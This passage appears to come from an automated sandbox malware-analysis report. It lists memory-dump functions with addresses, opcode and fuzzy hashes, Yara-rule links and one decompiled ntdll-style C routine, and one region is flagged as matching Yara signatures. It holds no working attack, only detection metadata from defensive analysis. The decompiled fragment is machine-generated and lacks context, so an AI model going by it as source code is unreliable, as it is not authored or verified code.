                                              0x0196366b
                                              0x0196366d
                                              0x01963672
                                              0x01963679
                                              0x01963685
                                              0x0196368d
                                              0x0196369d
                                              0x019636a7
                                              0x019636b8
                                              0x019636c6
                                              0x019636c7
                                              0x019636dc
                                              0x019636e1
                                              0x019636e7
                                              0x019636e9
                                              0x019636e9
                                              0x01963703
                                              0x01963703
                                              0x019635b5
                                              0x019635c0
                                              0x019635c4
                                              0x00000000
                                              0x00000000
                                              0x019635ca
                                              0x019635d7
                                              0x019635e2
                                              0x019635e6
                                              0x019635e8
                                              0x019635f5
                                              0x019635fa
                                              0x01963603
                                              0x01963604
                                              0x01963609
                                              0x0196360a
                                              0x01963612
                                              0x01963613
                                              0x0196361e
                                              0x01963622
                                              0x01963628
                                              0x0196362f
                                              0x0196362f
                                              0x01963636
                                              0x01963638
                                              0x0196363b
                                              0x01963642
                                              0x01963642
                                              0x01963636
                                              0x01963657
                                              0x01963657
                                              0x0196365c
                                              0x01963662
                                              0x01963669
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryHash
                                              • API String ID: 0-2202222882
                                              • Opcode ID: a5e24a02cfdc2ad75aa93241c0d4c3fd4453dadcf59c2d433cf5f689a836f717
                                              • Instruction ID: 2140cb99df37ed6c424c6d7e73e9eae94fc6cd8193f97abf16785a987324d7c4
                                              • Opcode Fuzzy Hash: a5e24a02cfdc2ad75aa93241c0d4c3fd4453dadcf59c2d433cf5f689a836f717
                                              • Instruction Fuzzy Hash: F44101B1D0152DAADB21DA50CC85FAEB77CAB54714F0045A5EA0DAB241DB309F888FA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019B05AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 71%
                                              			E019B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E019B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01929730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E019AA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E019AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E019B1293(_t79, _v40, E019B07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E01907D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E019A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                              0x019b05c5
                                              0x019b05ca
                                              0x019b05d3
                                              0x019b06db
                                              0x019b06db
                                              0x019b06dd
                                              0x019b06e3
                                              0x019b06e3
                                              0x019b05dd
                                              0x019b05e7
                                              0x019b05f6
                                              0x019b0600
                                              0x019b0607
                                              0x019b0610
                                              0x019b0615
                                              0x019b061a
                                              0x019b061c
                                              0x019b061e
                                              0x019b0624
                                              0x019b0625
                                              0x019b0627
                                              0x019b0628
                                              0x019b0631
                                              0x019b0640
                                              0x019b064d
                                              0x019b0654
                                              0x019b0654
                                              0x019b0631
                                              0x019b066d
                                              0x019b0674
                                              0x00000000
                                              0x00000000
                                              0x019b0692
                                              0x019b069e
                                              0x019b06b0
                                              0x019b06a0
                                              0x019b06a9
                                              0x019b06a9
                                              0x019b06b8
                                              0x019b06d6
                                              0x019b06d6
                                              0x00000000

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `
                                              • API String ID: 0-2679148245
                                              • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction ID: 094d8d3476a725ad63bc0195ab5fff9048f6d8c4a9ccc16a161d863f6797952c
                                              • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                              • Instruction Fuzzy Hash: 4631B372604346ABE710DE29CE85F9B7BE9BBC4754F184229FA589B280D670E904C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01963884, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryName
                                              • API String ID: 0-215506332
                                              • Opcode ID: f35ca9f0ab4bc8663979f67feab0bcb4a022c05831446d36bd7a0daad3c73714
                                              • Instruction ID: 83aa04ffa85278e0f018d65a287b2de354fbdb4c3fdc8e847f494199be0cd367
                                              • Opcode Fuzzy Hash: f35ca9f0ab4bc8663979f67feab0bcb4a022c05831446d36bd7a0daad3c73714
                                              • Instruction Fuzzy Hash: FF31E832D0051AEFEB15DA58C945E6BB77CFB90720F014169E91CA7251D7309F00CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0191D294, Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: fd48f685ac812849b26093eda96435e9d76d35bb90f83376596eebdad985f524
                                              • Instruction ID: d2d786094d4c484b01b2178325c847f57bed59140abcf6165e7f48012a4fd381
                                              • Opcode Fuzzy Hash: fd48f685ac812849b26093eda96435e9d76d35bb90f83376596eebdad985f524
                                              • Instruction Fuzzy Hash: CE31C2B15083099FC721DF68C984D6BBBE8FBD5698F000A2EF99883250D734DD45CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018F1B8F, Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: WindowsExcludedProcs
                                              • API String ID: 0-3583428290
                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction ID: b5eee3fc5890f8e2bbf4a094323009912bb766d4300afaae094d521f37157930
                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                              • Instruction Fuzzy Hash: 2C21C87B50112DEBDB229A998844F5B7BADEF81B51F054429FB48DB200D631DE0097A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0190F716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: c0f6834b7b62052f3586ace096423ec05eab489e0d2e68db0469a19034f8d6e2
                                              • Instruction ID: 80ceba47da2984130a71ca1b447458e2322a43ead9bccee6eed6c874dd8a2cef
                                              • Opcode Fuzzy Hash: c0f6834b7b62052f3586ace096423ec05eab489e0d2e68db0469a19034f8d6e2
                                              • Instruction Fuzzy Hash: 10119335304A028FEB378E1D8490B3676DAEB95B25F24492AE56DCB3D1D7B0CA418343
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01998DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                              Download Yara Rule
                                              Strings
                                              • Critical error detected %lx, xrefs: 01998E21
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Critical error detected %lx
                                              • API String ID: 0-802127002
                                              • Opcode ID: e5ebb508c562db353db2dff7c4232d468b40fd7c3ba349558769967a220b25ab
                                              • Instruction ID: c109bc565b31a2e0a5fc38d7ff105eb07b78c1529422183ad13a095ec1042895
                                              • Opcode Fuzzy Hash: e5ebb508c562db353db2dff7c4232d468b40fd7c3ba349558769967a220b25ab
                                              • Instruction Fuzzy Hash: 1E1175B5D00348DADF28EFE88515B9CBBF4BB49311F24421EE16DAB282C3341602CF14
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0197FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                              Download Yara Rule
                                              Strings
                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0197FF60
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                              • API String ID: 0-1911121157
                                              • Opcode ID: 02b6bc6be80b8034dc3c062189541b39e04554b504231708388489ec65ff338a
                                              • Instruction ID: 8d8d4459a1445bd4a213732f753c3f4b7417e3683d9b2b6e64cd4468ca91a0ac
                                              • Opcode Fuzzy Hash: 02b6bc6be80b8034dc3c062189541b39e04554b504231708388489ec65ff338a
                                              • Instruction Fuzzy Hash: F6110471910644EFEB26DBA4C948F98BBB2FF84715F558044E10C672A1CB389990CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019B5BA5, Relevance: .6, Instructions: 592COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6157bbb2641a7b9f71845dcb4acec0392f6258c22c1b9be25ef99ad1fc9c32e6
                                              • Instruction ID: 8b5b72675191959cbb9b851db269efd4ab3bddc87fba49f4b5165de3966a3fe7
                                              • Opcode Fuzzy Hash: 6157bbb2641a7b9f71845dcb4acec0392f6258c22c1b9be25ef99ad1fc9c32e6
                                              • Instruction Fuzzy Hash: 9D425A71901229CFEB24CF68C980BE9BBB5FF49305F1581AAD94DEB242D734A985CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01904120, Relevance: .4, Instructions: 444COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a66866b5b140bf96f2df5d1524c8eb9526308843acd302ab972f2cab311eb914
                                              • Instruction ID: 142bd26c65995f6d210f7411878f620c73d8a6bcec943216e9049be427a4579e
                                              • Opcode Fuzzy Hash: a66866b5b140bf96f2df5d1524c8eb9526308843acd302ab972f2cab311eb914
                                              • Instruction Fuzzy Hash: 76F18D706083118FC726CF19C480A7AB7E5FF98715F05492EFA8ACB291E738D995CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019120A0, Relevance: .4, Instructions: 420COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f8ec6bb20630f7ecd5452595effe42f2650069e0e6a624b6ada9412f1bd41e15
                                              • Instruction ID: 6ab9fe46afa73f050fc5a59d59964a3a4a703460b1cad82f88c312ff510dccca
                                              • Opcode Fuzzy Hash: f8ec6bb20630f7ecd5452595effe42f2650069e0e6a624b6ada9412f1bd41e15
                                              • Instruction Fuzzy Hash: F2F13A316083459FE726DF2CC440B6A7BE9BFC5324F25891DE99D9B246D734D881CB82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018FD5E0, Relevance: .4, Instructions: 353COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6b5ef162c17b0be85c16960c32dbcd9aadc952fe84b158d4cdd47cf3ab677044
                                              • Instruction ID: b330c733ca37444b431ef9dfffd69593678e4a03036708ff212d61cd18c2d7e9
                                              • Opcode Fuzzy Hash: 6b5ef162c17b0be85c16960c32dbcd9aadc952fe84b158d4cdd47cf3ab677044
                                              • Instruction Fuzzy Hash: 82E1D331A0535ACFEB35CF59C880B69B7B6BF85318F04429DDB0E9B291D7349A81CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018F849B, Relevance: .3, Instructions: 290COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6cda8693f2a08a92507e0f3f663c4a2a3fc8dca43fea79bb468ac43f9c921890
                                              • Instruction ID: 00926f442435e2c84bf1a44c8e5fdefe69b4be19186429d667d72cae28ee3792
                                              • Opcode Fuzzy Hash: 6cda8693f2a08a92507e0f3f663c4a2a3fc8dca43fea79bb468ac43f9c921890
                                              • Instruction Fuzzy Hash: BEB15D70E00209DFDB19DFD9C984AAEBBB9BF99308F10412DE609EB345D774AA45CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0191513A, Relevance: .3, Instructions: 258COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a5fa046b0fd3cf336b21b40231993333f081da4826c9e061b38354c04fbb3e1f
                                              • Instruction ID: d4d38f74b2e5d35f10a8fb96c4e2cc75fecdcc066e5261ab06dbd6744d2d1a8c
                                              • Opcode Fuzzy Hash: a5fa046b0fd3cf336b21b40231993333f081da4826c9e061b38354c04fbb3e1f
                                              • Instruction Fuzzy Hash: 6FC142755093818FE355CF28C480A5AFBF1BF89304F588A6EF9999B352D770E885CB42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019103E2, Relevance: .3, Instructions: 254COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f3d97f0376f480e44c848347dcb68e72508ae486dc7147dfde5e938fc7d8859d
                                              • Instruction ID: 460069cc366651b765a1224d3cffaa09bae2602aeab70f33ee4fa70237b5bcb4
                                              • Opcode Fuzzy Hash: f3d97f0376f480e44c848347dcb68e72508ae486dc7147dfde5e938fc7d8859d
                                              • Instruction Fuzzy Hash: CC915C31E002199FEB71DB6CC844BAD7BA8AB41724F090261FE19BB2D5E734ACC0C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018EC600, Relevance: .2, Instructions: 225COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04994c46be6e54f1f129dc5222f7957748743845456c2f710b8703bc29ed03e4
                                              • Instruction ID: b68ebd751074155a076219aa665db8c9fcb78983b063bddb6a9195e051e25684
                                              • Opcode Fuzzy Hash: 04994c46be6e54f1f129dc5222f7957748743845456c2f710b8703bc29ed03e4
                                              • Instruction Fuzzy Hash: B481A5756042418BDB6ACE98C890E7B77E9EB84354F54482EEE4DAB241D330DE44CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0197B8D0, Relevance: .2, Instructions: 199COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fa8bf9eff41dc70e6eaa12a1d09f9bbff3957d07b10cf728d154294602e384b1
                                              • Instruction ID: 9e37219e603556dae1b493fa634077efac6d2af94ed181689533559c21eb22a0
                                              • Opcode Fuzzy Hash: fa8bf9eff41dc70e6eaa12a1d09f9bbff3957d07b10cf728d154294602e384b1
                                              • Instruction Fuzzy Hash: 9C71F232200706AFE736EF19C845F66BBE9EF80725F144928E65E876A0DB75E940CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01966DC9, Relevance: .2, Instructions: 199COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                              • Instruction ID: e47a7a3be54038ed56ea1fe1162057e084970ce80ad247bc528c606270f4bc35
                                              • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                              • Instruction Fuzzy Hash: F2717171900619EFDB15DFA8C984EEEBBB9FF88714F104469E509E7290D730EA41CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018E52A5, Relevance: .2, Instructions: 161COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ec9d8a875d376fceedd65343b5bc967d00405d0147419d59b8a57a00409dc614
                                              • Instruction ID: 3c4abbcf3bd5a5b56d3c425e2738f6bb22ee02ec2f5ce42b902ebb76c1926be7
                                              • Opcode Fuzzy Hash: ec9d8a875d376fceedd65343b5bc967d00405d0147419d59b8a57a00409dc614
                                              • Instruction Fuzzy Hash: C951CD352053429FD722EF68C844B27BBE4FF90718F14091EF69997652E770E944C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01912AE4, Relevance: .2, Instructions: 159COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3194eb8f0c87b6fef1fab7a26fedb2fc1dc72b3a9fa529bf37e826757315d98f
                                              • Instruction ID: 1cd91b74cde5a0bad8de937ea860cb427a6193e4676c13e5f788dbf6551833e9
                                              • Opcode Fuzzy Hash: 3194eb8f0c87b6fef1fab7a26fedb2fc1dc72b3a9fa529bf37e826757315d98f
                                              • Instruction Fuzzy Hash: C451C576B00119CFCB15DF1CC8809BDB7F1FB89700725845AE95A9B369D730AAD1CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019AAE44, Relevance: .2, Instructions: 152COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d5ebdcb1f6a012ab48c84fd25f98f6227f2a483517949c20f290735b1d7d26fc
                                              • Instruction ID: 5850b3ee9615a1beb62e6db5363314ca4336e91707583e6ee06288d312f065b3
                                              • Opcode Fuzzy Hash: d5ebdcb1f6a012ab48c84fd25f98f6227f2a483517949c20f290735b1d7d26fc
                                              • Instruction Fuzzy Hash: B241F4717002115BD72A9A29C894B3BB79DEF84621F944619FA1E872D0DB34E809C6D1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0190DBE9, Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 034c910ad39690bb7c4d068c48d97d208a8320cad082aaa70f0c20cd04a36690
                                              • Instruction ID: cec8723bf4f967786a49fd372f898f613d3663194a1bff8fb19aa6285ce96688
                                              • Opcode Fuzzy Hash: 034c910ad39690bb7c4d068c48d97d208a8320cad082aaa70f0c20cd04a36690
                                              • Instruction Fuzzy Hash: 5B519175E01616DFCB16CFE8C480A9EBBF5BB48310F24855AD959E7385DB30AA84CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018FEF40, Relevance: .1, Instructions: 147COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                              • Instruction ID: 08ecceee30e2dbf053223caaea4219a70bc1b56b6a3a8fe9b5c5bb1324dcc27d
                                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                              • Instruction Fuzzy Hash: AF51F331A042499FEB25CB6CC0C0BAEBBB1EF45318F1881ACC745D3282C375AB89C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019B740D, Relevance: .1, Instructions: 141COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                              • Instruction ID: b8c50eb76d99e31ad7cf296018118cf64d8f681afec41b32199c7c878d17fceb
                                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                              • Instruction Fuzzy Hash: 1F51C171500646DFDB1ACF58C980A91BBF9FF85705F14C1AAE90C9F292E3B1E945CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01912990, Relevance: .1, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0c4b7850f72a6834be908802372e903db69709d66e2073232fed193ef833305d
                                              • Instruction ID: b7878a9dc311b03135c8ffb84b0d3265667c8c26ac4027c405cd73e3d7bbad2e
                                              • Opcode Fuzzy Hash: 0c4b7850f72a6834be908802372e903db69709d66e2073232fed193ef833305d
                                              • Instruction Fuzzy Hash: C5517B72A0020EDFDF25EF58C980EDEBBB6FF48310F258155E918AB255C3319992CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01914BAD, Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 36fc5fea2ccd9647122e3634e2ccd3d25fcd92054e41b5ba0c975c375c094da6
                                              • Instruction ID: 81fde450853b3f675c6fdd12d3111c431ac45045f7dceb6da87723c0f74f32e4
                                              • Opcode Fuzzy Hash: 36fc5fea2ccd9647122e3634e2ccd3d25fcd92054e41b5ba0c975c375c094da6
                                              • Instruction Fuzzy Hash: 6841B131E402299BDB21DF68C940FEAB7F8EF49750F4104A5E90CAB245EB349E84CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01914D3B, Relevance: .1, Instructions: 131COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c6113174d99895b6ab92692d52558c54c2ff6142c7e8262d71c38c82c0175ce
                                              • Instruction ID: 6d82704903c6460456a1f63ce49b86a413556468b05f27beddc252ca73724b91
                                              • Opcode Fuzzy Hash: 6c6113174d99895b6ab92692d52558c54c2ff6142c7e8262d71c38c82c0175ce
                                              • Instruction Fuzzy Hash: C441F471A44318AFEB32DF18CC80F6AB7A9EB49710F000499E94D9B285D770ED80CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 004157C6, Relevance: .1, Instructions: 128COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.346144380.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 95ab24193bd20358f1de5d31c02e6a3dec98826d7f8f07b00d4ec58b39046da8
                                              • Instruction ID: e75807ee9c6197054c2465b34bf0bc659396a29d3fd0fd762d77c2092bc5b624
                                              • Opcode Fuzzy Hash: 95ab24193bd20358f1de5d31c02e6a3dec98826d7f8f07b00d4ec58b39046da8
                                              • Instruction Fuzzy Hash: 7731FF73815A41EFD7106A34EC565E777B4EFD2724F484A1FD4A486182D70E84D2838A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018F8A0A, Relevance: .1, Instructions: 120COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 86df3a2a386a5d5c26699dbd179c635085a3d014ca1d2a85cef78c9f2abe4425
                                              • Instruction ID: 68186cac75908cb36d3500298c7b7f5e64529175728a35b562fd4293986e0508
                                              • Opcode Fuzzy Hash: 86df3a2a386a5d5c26699dbd179c635085a3d014ca1d2a85cef78c9f2abe4425
                                              • Instruction Fuzzy Hash: C0417FB1A0022D9BDB24CF59C888AA9B7F4EB95300F1045EADA19D7242E7709F84CF60
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019AAA16, Relevance: .1, Instructions: 120COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                              • Instruction ID: 4a1df62797b7cb094a833670eba35f340d6b28ad1535e3d19effc854b5bdd964
                                              • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                              • Instruction Fuzzy Hash: D8312232F006056BEB158B6ACC44BBFFBBBEFC0211F458469E809A7291DA70DD08C690
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019AFDE2, Relevance: .1, Instructions: 116COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                              • Instruction ID: 9d98d9590d768fdd65e4d590a880d76335f09098ce0b11c845ae4faaafa1983f
                                              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                              • Instruction Fuzzy Hash: 7F31E5322006416FD322976CC844F6EBBEDEBC5751F984458E68D8B742DA75EC45C7D0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

